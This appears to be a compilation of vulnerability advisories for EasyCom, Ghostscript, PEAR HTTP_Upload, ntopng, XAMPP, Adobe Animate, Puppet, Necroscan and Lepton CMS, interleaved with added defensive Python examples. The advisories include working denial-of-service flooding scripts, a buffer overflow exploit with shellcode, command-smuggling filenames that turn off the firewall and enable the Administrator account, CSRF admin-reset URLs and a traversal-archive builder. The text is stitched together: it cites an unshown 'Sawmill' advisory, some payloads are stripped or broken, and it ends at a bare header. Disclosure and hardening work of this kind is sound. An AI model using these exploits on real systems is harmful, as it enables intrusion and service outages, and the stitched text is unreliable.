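```python
"""Why a stored password hash must never double as the credential.

Added example for this page, not Sawmill code.  LEGACY_RECORD mirrors the
users.cfg excerpt quoted above (unsalted MD5 of "abc123"); the hardened
scheme (per-user random salt, PBKDF2-HMAC-SHA256, constant-time compare,
hash computed server-side from the typed password) is constructed here.
"""
import hashlib
import hmac
import os
from typing import Optional

# From the advisory's users.cfg excerpt: md5("abc123") with no salt.
LEGACY_RECORD = {"username": "admin",
                 "password_checksum": "e99a18c428cb38d5f260853678922e03"}

PBKDF2_ITERATIONS = 600_000          # OWASP's current floor for PBKDF2-HMAC-SHA256


def legacy_login(record: dict, submitted_checksum: str) -> bool:
    """The flawed scheme the advisory describes: the value the client submits
    is compared directly with the stored checksum.  Anyone who can read
    users.cfg therefore logs in with the hash and never needs the password."""
    return hmac.compare_digest(record["password_checksum"], submitted_checksum)


def make_record(username: str, password: str) -> dict:
    """Hardened record: fresh 16-byte salt, slow KDF, nothing reusable."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"username": username, "salt": salt.hex(),
            "iterations": PBKDF2_ITERATIONS, "pbkdf2_sha256": digest.hex()}


def hardened_login(record: dict, submitted_password: str) -> bool:
    """The server derives the key from what the user *typed*.  Pasting a
    stolen digest just gets it hashed again with the salt and fails; the
    stored value is useless without the password it was derived from."""
    candidate = hashlib.pbkdf2_hmac("sha256", submitted_password.encode(),
                                    bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(candidate.hex(), record["pbkdf2_sha256"])


def migrate_legacy(record: dict, submitted_password: str) -> Optional[dict]:
    """Transparent upgrade at next login: check the typed password against the
    old unsalted MD5 once, then replace the record with a hardened one.
    Returns None when the password is wrong so the caller can reject it."""
    old = hashlib.md5(submitted_password.encode()).hexdigest()
    if not hmac.compare_digest(old, record["password_checksum"]):
        return None
    return make_record(record["username"], submitted_password)


if __name__ == "__main__":
    stolen = LEGACY_RECORD["password_checksum"]
    print("legacy, hash pasted as password :", legacy_login(LEGACY_RECORD, stolen))
    upgraded = migrate_legacy(LEGACY_RECORD, "abc123")
    print("hardened, real password         :", hardened_login(upgraded, "abc123"))
    print("hardened, old hash pasted       :", hardened_login(upgraded, stolen))
    print("hardened, new digest pasted     :", hardened_login(upgraded, upgraded["pbkdf2_sha256"]))
```

The file permission problem is separate: the hardened record only stops users.cfg from doubling as a credential, it does not excuse leaving the file world-readable.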
EasyCom SQL iPlug Denial Of Service
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
=======
easycom-aura.com

Product:
========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe

SQL iPlug provides System i applications real-time access to heterogeneous and external databases (Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
CVE-2017-5359

Security Issue:
===============
SQL iPlug listens on port 7078 by default. It suffers from denial of service when an overly long string is sent via HTTP requests to the "D$EVAL" parameter.

Exploit/POC:
============
import socket

print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'

IP = raw_input("[IP]> ")
PORT = 7078
payload = "A"*43000

arr = []
c = 0

while 1:
    try:
        arr.append(socket.create_connection((IP, PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c += 1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break

Disclosure Timeline:
====================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version: February 20, 2017
February 22, 2017: Public Disclosure

Network Access:
===============
Remote

Severity:
=========
Medium

hyp3rlinx
Ghostscript 9.20 Filename Command Execution
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec

Vendor:
=======
ghostscript.com

Product:
========
Ghostscript 9.20
gs920w32.exe Windows (32 bit)
hash: fee2cc1b8b467888a4ed44dd9f4567ed

Ghostscript is a suite of software-based PostScript and PDF interpreters/renderers for file conversion.

Vulnerability Type:
===================
Filename Command Execution

CVE Reference:
==============
N/A

Security Issue:
===============
The Ghostscript ps2epsi translator, used to process ".ps" files, executes arbitrary commands from specially crafted filenames that contain OS commands as part of the processed PostScript file's name. This seems to work only using the ps2epsi translator; other tested GS translator calls like 'ps2pdf' fail.

c:\>ps2epsi
"Usage: ps2epsi "

For example, take a file "POC&;1.ps": it will run arbitrary commands contained after the ampersand character "&". If a user runs some automated script that calls the ps2epsi translator to process ".ps" files from a remote share or directory where the actual filename is unknown, it can potentially allow attackers to execute arbitrary commands on the victim's machine.

Characters like "/" and ":" are restricted in filenames, but Windows netsh and wmic can be abused to bypass some of these barriers.

Quick Ghostscript CL test. Create a file called Test1.ps

ps2epsi "Test1.ps" outfile

BOOM! calc.exe runs...

Exploit/POC:
============
Add the Ghostscript lib directory 'c:\Program Files (x86)\gs\gs9.20\lib' to the Windows environment Path, so we can easily call the 'ps2epsi' GS CMD.

Create the following malicious ".ps" PostScript files.

1) Turn off Windows Firewall
Test Advfirewall set allprofiles state off&;1.ps

2) Enable Windows Administrator account (using WMIC).
Test useraccount where name='administrator' set disabled='false'&;1.ps

If the user does not have wmic on the Path, fix it for the POC by setting the system environment variable: add "C:\Windows\system32\wbem;" to the 'Path' variable.

Run the below bat script to process a bunch of "*.ps" files.

"POC.bat"

@echo off
rem ghostscript Filename Command Execution POC
rem by hyp3rlinx
for %%1 in ("*.ps") do; ps2epsi "%%1" "evil.ps"

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: No replies
February 2, 2017: Public Disclosure

hyp3rlinx
PEAR HTTP_Upload v1.0.0b3 Arbitrary File Upload
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt
[+] ISR: ApparitionSEC

Vendor:
=======
pear.php.net

Product:
========
HTTP_Upload v1.0.0b3
Download: https://pear.php.net/manual/en/package.http.http-upload.php

Easy and secure management of files submitted via HTML Forms.

pear install HTTP_Upload

This class provides an advanced file uploader system for file uploads made from HTML forms.

Features:
* Can handle from one file to multiple files.
* Safe file copying from tmp dir.
* Easy detecting mechanism of valid upload, missing upload or error.
* Gives extensive information about the uploaded file.
* Rename uploaded files in different ways: as it is, safe or unique
* Validate allowed file extensions
* Multiple languages error messages support (es, en, de, fr, it, nl, pt_BR)

Vulnerability Type:
===================
Arbitrary File Upload

CVE Reference:
==============
N/A

Vulnerability Details:
======================
The package comes with an "upload_example.php" file to test the package. When uploading a "restricted" PHP file, the user will get a message like "Unauthorized file transmission".

Line 488 of "Upload.php":
var $_extensionsCheck = array('php', 'phtm', 'phtml', 'php3', 'inc');

If the user goes through the "Upload.php" code line by line, they will find an option to set a case sensitive check.

e.g. Line 503:
$_extensionsCaseSensitive = true

Line 874:
* @param bool $case_sensitive whether extension check is case sensitive.
*                             When it is case insensitive, the extension
*                             is lowercased before compared to the array
*                             of valid extensions.

This setting looks to prevent a mixed or uppercase extension bypass of the disallowed PHP file types before uploading. However, some developers are unaware that Apache can process a file with an extension like PHP.1, PHP.; etc. if the last extension is not specified in the list of MIME types known to the web server.

Therefore, attackers can easily bypass the security check by appending ".1" to the end of the file, which can result in arbitrary command execution on the affected server.

e.g. "ext_bypass.php.1" contents:

Successfully Tested on: Bitnami wampstack-5.6.29-0. Server version: Apache/2.4.23 (Win64)
Successfully Tested on: XAMPP for Linux 5.6.8-0 Server version: Apache/2.4.12 (Unix)

Disclosure Timeline:
====================
Vendor Notification: December 31, 2016
Similar bug reported and open 2012
Issue Fixed: January 17, 2017
January 25, 2017: Public Disclosure

Severity Level:
===============
High

hyp3rlinx
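The bypass above works because the check looks at the last extension only, while Apache's per-segment handler matching can still act on an earlier ".php". The following is an added example, not PEAR HTTP_Upload code: a Python 3 check that inspects every extension, allowlists rather than blocklists, and renames on the server side. BLOCKED_EXTENSIONS mirrors the $_extensionsCheck array quoted above; the allowlist, the sample filenames and the renaming scheme are constructed.

```python
"""Upload extension checks that look at every extension, not just the last.

Added example for this page, not PEAR HTTP_Upload code.  BLOCKED_EXTENSIONS
mirrors the $_extensionsCheck array quoted above; the allowlist, the sample
filenames and the server-side renaming are constructed here.
"""
import secrets

# From the advisory (Upload.php line 488): the package's default blocklist.
BLOCKED_EXTENSIONS = {"php", "phtm", "phtml", "php3", "inc"}

# Constructed: what this particular upload endpoint is willing to store.
# The allowlist of harmless types is the primary control; the blocklist
# above is only kept as a second opinion.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def extensions_of(filename: str) -> list:
    """Every dot-separated segment after the base name, lowercased.

    'ext_bypass.php.1' -> ['php', '1'].  With Apache's per-segment handler
    matching (the behaviour the advisory relies on), an unknown trailing
    segment does not stop an earlier '.php' from selecting the PHP handler,
    so a check that only inspects the last segment is blind to it."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]      # drop any path
    return base.lower().split(".")[1:]


def legacy_check(filename: str, case_sensitive: bool = False) -> bool:
    """Last-extension-only blocklist as described in the advisory (True means
    the upload would be accepted).  Kept to show the two bypasses."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    if not case_sensitive:
        ext = ext.lower()
    return ext not in BLOCKED_EXTENSIONS


def hardened_check(filename: str) -> bool:
    """Accept only a single, allowlisted extension, and refuse the name if
    that segment is blocked or looks like a PHP variant (php5, php7, ...)."""
    exts = extensions_of(filename)
    if len(exts) != 1:
        return False                   # no extension, or stacked ones like .php.1
    if any(e in BLOCKED_EXTENSIONS or e.startswith("php") for e in exts):
        return False
    return exts[0] in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Server-chosen name: random token plus the vetted extension.  Nothing
    the client typed survives into the path, so the web server and the check
    above are guaranteed to see the same name."""
    if not hardened_check(filename):
        raise ValueError(f"upload rejected: {filename!r}")
    return f"{secrets.token_hex(16)}.{extensions_of(filename)[0]}"


if __name__ == "__main__":
    for name in ("ext_bypass.php.1", "shell.PHP", "photo.jpg", "photo.jpg.php", ".htaccess"):
        print(f"{name:18} legacy={legacy_check(name)!s:5} "
              f"legacy(case-sensitive)={legacy_check(name, True)!s:5} "
              f"hardened={hardened_check(name)}")
    print("stored as:", stored_name("holiday.JPG"))
```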
NTOPNG Web Interface v2.4 CSRF Token Bypass
[+] Credits / Discovery: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
[+] ISR: ApparitionSEC

Vendor:
=======
www.ntop.org

Product:
========
ntopng Web Interface v2.4.160627

ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.

Vulnerability Type:
===================
CSRF Token Bypass

CVE Reference:
==============
CVE-2017-5473

Security Issue:
===============
Simply omitting the CSRF token or supplying an arbitrary token value bypasses CSRF protection when making HTTP requests to the ntopng web interface, allowing remote attackers to make HTTP requests on an authenticated user's behalf if the user clicks a malicious link or visits an attacker's webpage etc.

Exploit/POC:
============
1) Change admin password
http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED=admin_password=xyz123_new_password=xyz123

2) Add arbitrary user
http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED; method="GET">
document.forms[0].submit()

Disclosure Timeline:
====================
Vendor Notification: January 11, 2017
Vendor acknowledgement: January 12, 2017
Vendor Fixed Issue
January 20, 2017: Public Disclosure

Network Access:
===============
Remote

Impact:
=======
Information Disclosure
Privilege Escalation

Severity:
=========
High

All content (c) HYP3RLINX - Apparition Hyp3rlinX
XAMPP Control Panel Memory Corruption Denial Of Service
[+] Credits: John Page (hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt
[+] ISR: ApparitionSec

Vendor:
www.apachefriends.org

Product:
XAMPP Control Panel

XAMPP is a free and open source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages.

Vulnerability Type:
Memory Corruption DOS

CVE Reference:
N/A

Vulnerability Details:
XAMPP Control Panel crashes with an access violation when junk bytes are written into several different ports. Tested ports / versions:

(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0), 79, 105, 106, 143

It is not that XAMPP Control Panel is listening on some port; however, memory corruption and Denial Of Service do occur when junk is constantly written into, for instance, the MySQL, Tomcat, FileZilla or Mercury Mail listening ports.

1) Launch XAMPP Control Panel
2) Run the exploit script against some ports like 3306, 79, 105 (Mercury Mail) with Apache and/or Tomcat running. Target different service and port combinations to reproduce.

Important to note is that neither MySQL nor Apache itself crash; it IS the XAMPP Control Panel that crashes with an Access Violation.

Tested Windows SP1

POC Video: https://vimeo.com/196938261

Exploit code(s):

# Python 2
import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr = []   # keep every connection open so none is reclaimed
c = 0

while 1:
    try:
        arr.append(socket.create_connection((IP, PORT)))
        arr[c].send("DOOM")
        print "Die!"
        c += 1
    except socket.error:
        print "[+] Done!\n"
        raw_input()
        break

Disclosure Timeline:
Vendor Notification: November 1, 2016
Vendor acknowledgement: November 4, 2016
Vendor released Fix : December 22, 2016 (NO public mention as of the time of this writing)
December 24, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

hyp3rlinx

Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt
[+] ISR: ApparitionSec

Vendor:
www.adobe.com

Product(s):
Adobe Animate 15.2.1.95 and earlier versions

Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and FutureSplash Animator) is a multimedia authoring and computer animation program developed by Adobe Systems.

Platforms:
Windows / Macintosh

Vulnerability Type:
Critical Memory Corruption Vulnerability

CVE Reference:
CVE-2016-7866
APSB16-38

Vulnerability Details:
Adobe Animate suffers from a Buffer Overflow when creating .FLA files with ActionScript Classes that use overly long Class names. This causes memory corruption, leading to possible arbitrary code execution upon opening a maliciously created .FLA Flash file.

Reproduction / POC:
1) Create a FLA with an overly long Class name in the FLA Class publish properties input field.
2) Save and close.
3) Reopen the FLA and click edit to open the .as script file.
4) "Ctrl + S" to save, then boom: access violation.

Distributed:
Create a new ".as" ActionScript 3 (AS3) file and give it a very long class name in the input field, then hit "Ctrl+S" to save; you will crash the IDE. The next way described is ONE way attackers can distribute a malicious .FLA, abusing JSFL, the Flash JavaScript application programming interface (JavaScript API or JSAPI).

1) Create the following .JSFL file:

fl.getDocumentDOM().save();
fl.getDocumentDOM().testMovie();

2) Create a MovieClip stored in the FLA library with a very long class name that extends MovieClip and export it for ActionScript etc...
3) Drag the MovieClip to the stage.
4) Bundle the FLA/JSFL file and make it available for download, for example as a demonstration of how to use JSFL to call the save() / publish() functions. The user opens the .FLA, runs the harmless-looking JSFL code, then BOOM!

Reference:
https://helpx.adobe.com/security/products/animate/apsb16-38.html

Disclosure Timeline:
Vendor Notification: May 28, 2016
December 13, 2016 : Public Disclosure

Exploitation Technique:
Local

Severity Level:
High

hyp3rlinx

Puppet Enterprise Web Interface Authentication Redirect
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt
[+] ISR: ApparitionSec

Vendor:
www.puppet.com

Product:
Puppet Enterprise Web Interface
Version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure.

Vulnerability Type:
Authentication Redirect

CVE Reference:
CVE-2016-5715

Vulnerability Details:
When logging into the Puppet Enterprise Web Interface, users can be redirected to attacker-controlled servers. If a user logs in using an attacker-supplied authentication link, this can result in credential theft etc.

Fixed in version 2016.4.0

References:
https://puppet.com/security/cve/cve-2016-5715

Exploit code(s):
To bypass the character filters you need to pass double forward slashes "//" or the redirect will fail.

https://victim-puppet-server/auth/login?redirect=//attacker-server

Disclosure Timeline:
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Fix: in version 2016.4.0
October 17, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
Medium

hyp3rlinx

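The "//" detail above is the classic way a redirect filter that only blocks "http://" and "https://" gets past: a protocol-relative URL keeps the browser's current scheme but changes the host. The following is an added example of how a login handler can validate a redirect parameter so that only same-site paths survive; it is not Puppet Enterprise code, and the function name and default landing path are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit


def safe_redirect_target(redirect: str, default: str = "/") -> str:
    """Return a same-site path for a post-login redirect, or ``default``.

    Rejected: absolute URLs (any scheme or host), protocol-relative targets
    such as //attacker-server, backslash variants that browsers normalise
    to slashes, and anything carrying control characters.
    """
    if not redirect:
        return default

    # Several browsers treat "\" like "/", so "/\attacker-server" would be
    # read as "//attacker-server" client-side. Normalise before checking.
    candidate = redirect.replace("\\", "/")

    # CR/LF and other control characters have no place in a Location
    # header; refuse rather than try to sanitise.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
        return default

    parts = urlsplit(candidate)
    # Any scheme or network location means the target leaves this site.
    # urlsplit() already classifies "//host" as a netloc.
    if parts.scheme or parts.netloc:
        return default

    # Require an absolute path on this origin; the explicit "//" check
    # covers "///host"-style inputs that different parsers read differently.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default

    # Rebuild from path, query and fragment only, dropping anything else.
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))
```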
Necroscan <= v0.9.1 Buffer Overflow
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec

Vendor:
nscan.hypermart.net

Product:
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13 circa 1999

NScan is one of the fastest and most flexible portscanners for Windows. It is specially designed for scanning large networks and gathering related network/host information. It supports remote monitoring, usage of host and port lists, option profiles, speed and accuracy tuning, etc. It also contains a traceroute, dig and whois, which work together with the scanner.

Vulnerability Type:
Buffer Overflow

Vulnerability Details:
dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups; this component has a trivial buffer overflow vulnerability. 1,001 bytes give a direct EIP overwrite, and our shellcode will be sitting at the ESP register.

Important: we need "\x2E\x2E" in the WinExec("calc.exe") shellcode, as once a single "." is injected it gets converted to an unusable character and the call will fail to execute. However, we can bypass this by double padding our shellcode with "\x2E\x2E" instead of a single "\x2E"; now it will execute!

payload="A"*997+"" <= EIP is here

1) Use mona or findjmp.exe to get a suitable JMP ESP register.
2) Run the python script below to generate the exploit payload.
3) Paste the payload into the DNS lookup 'Target' input field.
4) Click the 'TCP lookup' button.
5) BOOM, see calc.exe run!

Stack dump...

EAX 0021
ECX 2D68
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 1  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_NO_MORE_FILES (0012)
EFL 0246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Exploit code(s):

# Python 2
import struct

#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#
#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes, have use !mona jmp -r esp
#plugin or findjmp.exe.

rp = struct.pack("<L", 0x75658BD5)   #JMP ESP kernel32

# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc = ("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
      "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
      "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
      "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
      "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
      "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65"   #<=== \x2E\x2E (Deal with "." character problem)
      "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

payload = "A"*997 + rp + "\x90"*10 + sc

file = open("NECRO", "w")
file.write(payload)
file.close()

print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='

Exploitation Technique:
Local

Severity Level:
High

HYP3RLINX

Lepton CMS PHP Code Injection
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
www.lepton-cms.org

Product:
Lepton CMS 2.2.0 / 2.2.1 (update)

LEPTON is an easy-to-use but fully customizable Content Management System (CMS).

Vulnerability Type:
PHP Code Injection

CVE Reference:
N/A

Vulnerability Details:
No input validation check is done on the "Database User" input field when entering Lepton CMS setup information using the Install Wizard. Therefore, a malicious user can write whatever they want into "config.php", which can allow PHP Remote Command Execution on the host system.

e.g. In the database username field, use a single quote to close the "DB_USERNAME" value, then open our own PHP tags:

');?>

Now in "config.php" the Database username becomes ===> define('DB_USERNAME', '');?>');

A security check attempt is made by Lepton to disallow making multiple HTTP requests for "config.php". On line 3 of the "config.php" file we find:

///
if(defined('LEPTON_PATH')) {
    die('By security reasons it is not permitted to load \'config.php\' twice!! Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!');
}
///

However, the security check is placed on line 3, well before "LEPTON_PATH" has been defined, allowing complete bypass of that access control check. Now we can inject our own PHP code into the config, allowing Remote Command Execution or Local/Remote File Includes etc...

Next, make an HTTP GET request to "http://victim-server/upload/install/save.php" again and code execution will be achieved, or request "config.php" directly, as the security check made on line 3 of "config.php" to prevent multiple HTTP requests to "config.php" does NOT work anyhow.

In situations where an installation script is provided as part of some default image, often made available as a convenience by hosting providers, this can be used to gain code execution on the target system and bypass whatever security access controls/restrictions etc.

References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php

Exploit code(s):
1) At step 4 of Lepton's Install Wizard, enter ');?> for the Database User name, then fill in the rest of the fields.
2) Click go to step 5 and fill in the required fields, then click "Install LEPTON".
3) Make an HTTP GET request to:

http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
OR
http://localhost/LEPTON_stable_2.2.0/upload/config.php

BOOM pop calc.exe...

Disclosure Timeline:
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 (thanks Henri Salo)
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure

Severity Level:
High

HYP3RLINX

Lepton CMS Archive Directory Traversal
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec

Vendor:
www.lepton-cms.org

Product:
Lepton CMS 2.2.0 / 2.2.1 (update)

LEPTON is an easy-to-use but fully customizable Content Management System (CMS).

Vulnerability Type:
Archive Directory Traversal

CVE Reference:
N/A

Vulnerability Details:
Lepton has a feature that lets users install new modules. If a malicious user uploads an archive and the module is not valid, it will generate an error. However, the malicious archive still gets decompressed, and no check is made for ../ characters in the file name, allowing arbitrary PHP files to be placed outside the intended target directory for installed modules. This can then be used to execute remote commands on the affected host system.

e.g. We get the error message below under the "Add Ons" tab, Install Module:

Invalid LEPTON installation file. Please check the *.zip format.[1]

The archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in the file name.

Exploit code(s):

<?php
if ($argc < 2) {
    echo "usage: php <script> <archive-name>\r\n";
    exit();
}
$file_name = $argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
// entry name walks up out of the modules directory; its content was stripped from this copy
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();
echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>

Disclosure Timeline:
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 (thanks Henri Salo)
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure

Exploitation Technique:
Local

Severity Level:
High

HYP3RLINX

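The two defects above are that entry names are never checked and that extraction happens before validation. The following is an added example, not Lepton's code, of a module-archive extractor that validates every entry name (including Windows-style backslash paths like the one in the PoC) before writing anything, so an archive with one bad entry leaves nothing on disk; the directory layout and the sample archives are constructed for the demonstration.

```python
import tempfile
import zipfile
from pathlib import Path, PurePosixPath


class UnsafeArchiveEntry(ValueError):
    """Raised when an archive entry would land outside the target directory."""


def validate_member_name(member_name: str) -> str:
    """Return a normalised relative path for an archive entry, or raise.

    Windows-built archives (and the PoC above) may use backslashes, so they
    are mapped to "/" before any check; otherwise "..\\..\\RCE.php" would
    look like a single, harmless file name.
    """
    name = member_name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise UnsafeArchiveEntry(f"absolute path: {member_name!r}")
    if ".." in PurePosixPath(name).parts:
        raise UnsafeArchiveEntry(f"directory traversal: {member_name!r}")
    return name


def is_safe_member_name(member_name: str) -> bool:
    try:
        validate_member_name(member_name)
        return True
    except UnsafeArchiveEntry:
        return False


def extract_module_archive(archive: Path, dest: Path) -> list:
    """Validate every entry first, then extract. Nothing is written if any
    entry is unsafe. A final resolve() check on the real filesystem path
    backs up the string checks."""
    dest = dest.resolve()
    with zipfile.ZipFile(archive) as zf:
        planned = []
        for info in zf.infolist():
            rel = validate_member_name(info.filename)
            target = (dest / rel).resolve()
            if target != dest and dest not in target.parents:
                raise UnsafeArchiveEntry(f"escapes target dir: {info.filename!r}")
            planned.append((info, target))
        written = []
        for info, target in planned:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def make_archive(path: Path, entries: dict) -> Path:
    """Build a constructed test archive from {entry name: content}."""
    with zipfile.ZipFile(path, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return path


def demo() -> dict:
    """Run the extractor on a benign and a traversal archive built in a
    temporary directory and report what ended up on disk."""
    results = {}
    with tempfile.TemporaryDirectory() as tmpdir:
        tmp = Path(tmpdir)
        modules = tmp / "modules"          # the intended install directory
        modules.mkdir()
        benign = make_archive(tmp / "good.zip",
                              {"mymodule/info.php": b"<?php // module info\n"})
        evil = make_archive(tmp / "evil.zip", {
            "mymodule/info.php": b"<?php // looks fine\n",
            # same entry name as the PoC; content is a constructed placeholder
            "..\\..\\..\\..\\..\\..\\..\\..\\RCE.php": b"<?php // placeholder\n",
        })
        results["benign"] = [p.relative_to(modules).as_posix()
                             for p in extract_module_archive(benign, modules)]
        try:
            extract_module_archive(evil, modules)
            results["evil"] = "extracted"
        except UnsafeArchiveEntry as exc:
            results["evil"] = str(exc)
        # Fail-closed: neither the traversal file nor the benign-looking
        # first entry of evil.zip may exist anywhere under tmp.
        results["leaked"] = sorted(p.as_posix() for p in tmp.rglob("RCE.php"))
        results["files_in_modules"] = sorted(
            p.relative_to(modules).as_posix()
            for p in modules.rglob("*") if p.is_file())
    return results
```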
WSO2-CARBON v4.4.5 CSRF / DOS
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
